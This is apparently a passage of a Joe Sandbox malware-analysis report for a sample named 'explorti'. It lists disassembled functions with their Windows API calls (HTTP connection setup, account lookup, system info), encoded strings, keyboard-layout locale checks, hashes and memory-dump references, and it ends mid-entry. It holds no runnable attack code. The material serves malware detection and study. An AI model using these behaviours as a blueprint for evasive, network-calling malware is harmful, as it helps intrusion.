6JLUcxtnEx==, xrefs: 0028C2EB, 0028C543
d4., xrefs: 0028E2FF

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$d4.$invalid stoi argument$stoi argument out of range
API String ID: 688256393-3149204611
Opcode ID: 4b51266ce6a71ce44629943b97a49dae285e1161869cfe4625fe9159d5888475
Instruction ID: 6158bda2b5625e3619a5707c6032a31969c19bbfc83cc13085c2b6187238ed05
Opcode Fuzzy Hash: 4b51266ce6a71ce44629943b97a49dae285e1161869cfe4625fe9159d5888475
Instruction Fuzzy Hash: 10B106B16211189BEF24DF28CC84BADBB79EF45304F6041A9F509972D6D7709AD0CFA4

Function 002865B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00286650

Strings

GUPmdK==, xrefs: 002867A1
EUVmdK==, xrefs: 002866F8
PAUfbBZl, xrefs: 0028666C

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: EUVmdK==$GUPmdK==$PAUfbBZl
API String ID: 1484870144-2376134257
Opcode ID: c2f25ecb39d815197b0afbbfab1724fa57e7bb3054fe56a349df8e7449705e7c
Instruction ID: b89d88dfb449d93c7135e88d1a6405da16ca036b96a39cdf792f4b1325b163cd
Opcode Fuzzy Hash: c2f25ecb39d815197b0afbbfab1724fa57e7bb3054fe56a349df8e7449705e7c
Instruction Fuzzy Hash: C191D3B19211189BDF28EF24CC89BEDB779EB45304F4045E9E50997282DA349FD8CFA4

Function 00293550 Relevance: 53.3, APIs: 1, Strings: 29, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0029425F

Part of subcall function 00297870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0029795C
Part of subcall function 00297870: __Cnd_destroy_in_situ.LIBCPMT ref: 00297968
Part of subcall function 00297870: __Mtx_destroy_in_situ.LIBCPMT ref: 00297971

Strings

9pG0, xrefs: 002954DB
UIrm, xrefs: 00293BD9
UIU0, xrefs: 002953A3
T4Ve, xrefs: 00293DC0
FAml, xrefs: 0029378F
246122658369, xrefs: 0028F647, 0028F924, 002904F7, 002908AA, 00291EA5, 002927EE, 00292A43, 00292AB0, 00292E88, 00293373, 002933D4, 00294F4D, 00294F8F, 00294F99, 002954F4
75G0, xrefs: 00295470
0657d1, xrefs: 0028FA9E, 00295489
KIK+, xrefs: 002947BD, 002948EC, 00294ADC, 00294C0B
stoi argument out of range, xrefs: 00292E02, 00294269, 00294EAC
7JS0, xrefs: 00295351
-., xrefs: 00294F3A
8lU=, xrefs: 00296383
UZbf, xrefs: 00293AEE
9YY0, xrefs: 002953CC
84K0, xrefs: 00295497
", xrefs: 00293E99
Toe0, xrefs: 00295447
6YK0, xrefs: 00295502
Dy==, xrefs: 0029369E, 00294D2D
invalid stoi argument, xrefs: 00292DE9, 00292DF8, 0029425A, 00294E9D
TZS0, xrefs: 0029537A
IEYUMK==, xrefs: 002954B9
8IG0, xrefs: 002953F5
KIG+, xrefs: 0028E734, 00294776, 002947ED, 00294A95, 00294B0C
TZC0, xrefs: 0029541E
7470, xrefs: 0029531D
85K3cq==, xrefs: 00294712
5120, xrefs: 00293ABF, 00293BAA

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: "$0657d1$246122658369$5120$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$FAml$IEYUMK==$KIG+$KIK+$T4Ve$TZC0$TZS0$Toe0$UIU0$UIrm$UZbf$invalid stoi argument$stoi argument out of range$-.
API String ID: 4234742559-3373658435
Opcode ID: 54b98e15823487ff40793cd8cc03ca97a45f62785fc72d2e8a1e4b0f5ebd9843
Instruction ID: 3017ab713b5b1a3934aecaff9593e49c2d913c3abeff20da342d9df009ec7292
Opcode Fuzzy Hash: 54b98e15823487ff40793cd8cc03ca97a45f62785fc72d2e8a1e4b0f5ebd9843
Instruction Fuzzy Hash: 42520571E202489BEF18EF78CC4AB9DBB75AF45304F50419DE405A7282D7359BA4CFA2

Function 002946C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00297870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0029795C
Part of subcall function 00297870: __Cnd_destroy_in_situ.LIBCPMT ref: 00297968
Part of subcall function 00297870: __Mtx_destroy_in_situ.LIBCPMT ref: 00297971

Part of subcall function 0028BD60: InternetOpenW.WININET(002D8D68,00000000,00000000,00000000,00000000), ref: 0028BDED
Part of subcall function 0028BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0028BE10
Part of subcall function 0028BD60: HttpOpenRequestA.WININET(?,00000000), ref: 0028BE5B

std::_Xinvalid_argument.LIBCPMT ref: 00294EA2

Strings

9pG0, xrefs: 002954DB
Toe0, xrefs: 00295447
6YK0, xrefs: 00295502
Dy==, xrefs: 0029369E, 00294D2D
UIU0, xrefs: 002953A3
TZS0, xrefs: 0029537A
246122658369, xrefs: 00294F4D, 00294F8F, 00294F99, 002954F4
IEYUMK==, xrefs: 002954B9
75G0, xrefs: 00295470
8IG0, xrefs: 002953F5
KIG+, xrefs: 00294776, 002947ED, 00294A95, 00294B0C
0657d1, xrefs: 00295489
KIK+, xrefs: 002947BD, 002948EC, 00294ADC, 00294C0B
TZC0, xrefs: 0029541E
7470, xrefs: 0029531D
stoi argument out of range, xrefs: 00294269, 00294EAC
7JS0, xrefs: 00295351
85K3cq==, xrefs: 00294712
-., xrefs: 00294F3A
8lU=, xrefs: 00296383, 00296652
9YY0, xrefs: 002953CC
84K0, xrefs: 00295497

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$TZC0$TZS0$Toe0$UIU0$stoi argument out of range$-.
API String ID: 2414744145-3054531741
Opcode ID: ee175be6e020a595b2322a42adad1855fbabb6d9a3880e9209c826d6d7345aaa
Instruction ID: 8c42f769c405a6965d24f70a151f7303f125381f20a62d08f0e742a10ec190a0
Opcode Fuzzy Hash: ee175be6e020a595b2322a42adad1855fbabb6d9a3880e9209c826d6d7345aaa
Instruction Fuzzy Hash: 3E232671E201588BEF19DB28CD8979DBBB6AF81304F5481D8E009AB2C6DB355FA4CF51

Function 00285DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Keyboard Layout\Preload, xrefs: 00285F64
00000422, xrefs: 00285FD9
00000423, xrefs: 0028600A
00000419, xrefs: 00285FA8
0000043f, xrefs: 0028603B

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 5cc40dcd4304d984f2b4c75a79f5425b0d8455154c6b827bc8470c46e71af65a
Instruction ID: a6a1917ba0d6e85c02d27f320eec7d907f264d603f0730b6b76a7ac303c8295d
Opcode Fuzzy Hash: 5cc40dcd4304d984f2b4c75a79f5425b0d8455154c6b827bc8470c46e71af65a
Instruction Fuzzy Hash: 95E19C71921218ABEF24EFA4CC8DBDEB779AB04304F5042D9E409A7291DB74AFD48F51

Function 00287D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00287EA3

Strings

HlusMa==, xrefs: 0028810A
HlurNa==, xrefs: 002881B2
HlurOK==, xrefs: 00288062

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: HlurNa==$HlurOK==$HlusMa==
API String ID: 1721193555-2203186029
Opcode ID: ac016dad7b57d7671bff97b41a32081bf1f114c297ed058162a64ad5c2066883
Instruction ID: 7887b95d4d3ccb4d68b2fd7a6e4edc82036ff2300587953fa6c46894540ed729
Opcode Fuzzy Hash: ac016dad7b57d7671bff97b41a32081bf1f114c297ed058162a64ad5c2066883
Instruction Fuzzy Hash: 4AD12774E216549BDF14FB28DC4A39D7771AB42314FA0428CE8066B3C2DB748EA48BD2

Function 002B6E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 002B6E23
GetFileInformationByHandle.KERNEL32(?,?), ref: 002B6E7D
__dosmaperr.LIBCMT ref: 002B6F12

Part of subcall function 002B7177: __dosmaperr.LIBCMT ref: 002B71AC

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 786491b805e2b2423cd0fd1d621f5c13a20b21bfed153849629bdc842bc4f82a
Instruction ID: 633d52979496cd469b7a6c58f797048d7de323b751bf0a2d1748027fed98d5d3
Opcode Fuzzy Hash: 786491b805e2b2423cd0fd1d621f5c13a20b21bfed153849629bdc842bc4f82a
Instruction Fuzzy Hash: EE416C75920205AADB24EFB5E8459FBBBF9EF88340B10442DF956D3611EA34A914CB21

Function 002882B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00288454

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 27e151f13a0d5e53cc75908a8464212e6afa0f5c86dda7986e63bbc9f612f3c6
Instruction ID: edcc112dae38786159575effa98860b6805e99ddd894108d0bf46d8f58e96c40
Opcode Fuzzy Hash: 27e151f13a0d5e53cc75908a8464212e6afa0f5c86dda7986e63bbc9f612f3c6
Instruction Fuzzy Hash: 575147759212199BEB24FF68CC45BEDB775EF45304F904298E808A72C1EF709AA08B91

Function 002B6C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dfeec1fba837be733dd7af619dd0283930b6374c43f15e81ef1dcb8753613d2
Instruction ID: 1660c0f0401bfef1e6ef0365cc089591ec27b1e3ae4c71d66f67ed8526cf5a9b
Opcode Fuzzy Hash: 9dfeec1fba837be733dd7af619dd0283930b6374c43f15e81ef1dcb8753613d2
Instruction Fuzzy Hash: 3F210A32A212097AEB117F689C46FEF37399F413B8F154310F9243B1D1DB749E259AA1

Function 002B6F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 002B6FB3

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 9e577899c9da3b54fea274a48f06c8423d5fa1b3623bfa36645e1960982ece2a
Instruction ID: 379131589945bdd6065ced008842e3c6d2cddf1922d2a85e8afe3256153b69b6
Opcode Fuzzy Hash: 9e577899c9da3b54fea274a48f06c8423d5fa1b3623bfa36645e1960982ece2a
Instruction Fuzzy Hash: 69114CB291020DABCF00DED1D984EEFB7BCAB08350F605262E516E2180EB34EB14CB61

Function 00296AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00296B65

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 4bedaccf0cb8899a272f89de4c84ad47951bfa02eacac33a115b98b2bcfb826d
Instruction ID: a945d0c1e0735cf2124c3d693c81c1288f856879debeb03bab5c75b1bd00ac18
Opcode Fuzzy Hash: 4bedaccf0cb8899a272f89de4c84ad47951bfa02eacac33a115b98b2bcfb826d
Instruction Fuzzy Hash: 5AF0D671E60514ABCB00BB689C0AB1D7B78A717764F800348E811672E1DB345A244BD2

Function 04C609FF Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2989929776.0000000004C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c60000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eeb7ee89a30caea05ee94a2e1f9dc346ea0b12ec07c2a26fd46278b02dba29a
Instruction ID: 4ea7f881ebbdd3d48c9950fb0af489e52d8b8292c434335316280be894acc3e8
Opcode Fuzzy Hash: 9eeb7ee89a30caea05ee94a2e1f9dc346ea0b12ec07c2a26fd46278b02dba29a
Instruction Fuzzy Hash: 8A21B2E724C111BEB142C5536FA4AFB6BAFE5C3274339C43BF443D6503E28A5A4A6172

Function 04C60AFA Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2989929776.0000000004C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c60000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dd9535a62f758aaa5950573ca2d909819a7abe8a14a228b5ca849c24b824641
Instruction ID: c9e9076fde98d89f1260f762573fe7612eab88ba2f3f1d8781286dafa1b4aed4
Opcode Fuzzy Hash: 9dd9535a62f758aaa5950573ca2d909819a7abe8a14a228b5ca849c24b824641
Instruction Fuzzy Hash: B91148E760C250AFE102C1537BE5BFA6B6FD5D6239734C46BF447EA102E6481B4A6232

Function 04C60AF3 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

